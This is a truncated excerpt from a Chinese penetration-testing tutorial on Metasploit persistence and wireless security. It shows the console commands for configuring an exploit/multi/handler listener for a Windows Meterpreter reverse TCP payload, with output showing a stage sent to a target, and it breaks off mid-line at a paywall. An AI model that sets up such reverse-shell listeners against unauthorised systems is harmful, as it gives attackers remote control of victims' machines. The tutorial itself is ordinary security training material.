渗透测试与无线安全:Metasploit 及无线协议解析
1. Metasploit 使用与持久化
1.1 创建 Meterpreter 监听器
利用 exploit/multi/handler 漏洞创建监听器,期望接收来自 Meterpreter 反向 TCP 负载的连接。需设置监听端口和 IP 地址,若系统有多个接口,IP 地址的设置尤为重要。以下是创建监听器的具体步骤:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 5698
LPORT => 5698
msf6 exploit(multi/handler) > set LHOST 192.168.1.8
LHOST => 192.168.1.8
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.8:5698
[*] Sending stage (175686 bytes) to 192.168.1.112
[*] Meter
渗透测试与无线安全解析
超级会员免费看
订阅专栏 解锁全文
1430

被折叠的 条评论
为什么被折叠?



